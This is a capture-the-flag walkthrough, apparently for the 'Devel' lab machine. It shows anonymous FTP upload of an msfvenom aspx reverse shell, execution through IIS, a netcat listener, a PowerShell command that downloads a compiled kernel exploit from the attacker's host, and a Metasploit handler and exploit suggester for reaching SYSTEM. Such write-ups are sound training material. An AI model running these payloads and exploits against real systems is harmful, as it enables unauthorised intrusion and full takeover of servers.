Devel

one line summary without msf :-: ftp(anonymous login) -->put aspx rev shell-->execute from IIS -->gain access-->whoami /priv --> SETokenimpersonate --> printspoof exploit --> rooted

1line summary [with msf] :-: ftp(anonymous login) -->put aspx meterpreter rev shell-->execute from IIS -->gain access(meterpreter)-->msf local exploit suggestor-->try available exploits -->rooted

Port Scanning

I have a habit of running scans in phases and them in sequences like scan1 scan2.

First Scan I ran was a full port scan; saved as file named scan1

nmap -p- -n -vvv -oN nmap/scan1 10.10.10.5

Second scan i ran for specific ports; saved as file named scan2

sudo nmap -p80,21 -sCV -oN nmap/scan2 10.10.10.5

Port 80 IIS running

Port 21 ftp is running

ftp $ip

Succesfully logged in with anonymous login.

upload a file to ftp access it through browser to confirm

ftp access is in the same as web home dir .

google search more about iis versions iis version 7.5 -- 2008 R2

Little bit about asp vs aspx

asp are vb script based

aspx are .net based

if the IIS was of 2003 or before I would have used asp based payload because it's old and only supports asp vb scripts whereas IIS 2008 is relatively recent and is .net based. So I'll go with aspx

Gaining Access

Create payload

msfvenom -p windows/shell_reverse_tcp LHOST=youriphere LPORT=4444 -f aspx -o rks.aspx

put secShark.aspx

execute the shell from bowser

get a shell back

nc -nvlp 1669

Windows Priv Esc (without MSF) Method1 [SeTokenImpersonate]

whoami /priv

you can see the SeTokenImpersonate is Enabled

Windows Priv Esc (without MSF) Method 2 [Kernel Exploit]

whoami iss apppool\web

systeminfo

gives you windows system related info for priv esc and local enum

info to look for ?? hotfixs architecture and os version

searchsploit -u // to update the searchsploit database

google windows 7 7600 32 bit arch or windows 7 x86 exploit

found:: ms11-046 for Priv Esc I copied the edb id and searched in searchsploit

searchsploit -m 40564

Cross Compiling Exploit

If you don’t have mingw-w64 installed, install it.

apt-get install mingw-w64

to compile the exploit use below menitoned command

i686-w64-mingw32-gcc 40564.c -o 40564.exe -lws2_32

on attacker machine start a http server python -m SimpleHTTPServer 80 Download exe using powershell

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.30:80/40564.exe', 'c:\Users\Public\Downloads\40564.exe')"

run the exploit 40564.exe

Check user whoami nt auth \system

rooted

Windows Priv Esc (with MSF)

Generate meterpreter payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST=youriphere LPORT=yourlisteningport -f aspx -o rks.aspx

I am being carefull with the payload selection as 64 bit payload is not going to work if the target is 32 bit 32 bit is the safest one to choose initially as 32 bit is going to work on 64 bit machine as well.

Setup listener for meterpreter

msfconsole

use exploit/multi/handler

show options

set payload windows/meterpreter/reverse_tcp

set lhost tun0

set lport

run

execute the shell from bowser and get a shell back

sysinfo

check if the architecture matches with the payload you used -- if not change your payload to target arch. and redo the above steps.

ctrl Z to background the session

search suggest looking for local exploit suggestor

use post/multi/recon/exploit_suggestor

session -l

set session 1

it is going to check for bunch of potential exploits available for this machine and provide you with the list

select one out of them and load it .

use exploit/....